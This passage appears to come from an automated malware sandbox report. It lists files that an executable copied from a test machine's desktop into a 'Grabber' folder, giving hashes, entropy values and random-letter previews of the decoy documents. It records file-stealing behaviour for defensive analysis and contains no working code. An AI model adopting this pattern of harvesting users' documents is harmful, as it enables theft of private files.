CATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC\DTBZGIOOSO.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC\MNULNCRIYC.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MNULNCRIYC\ZSSZYEFYMU.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
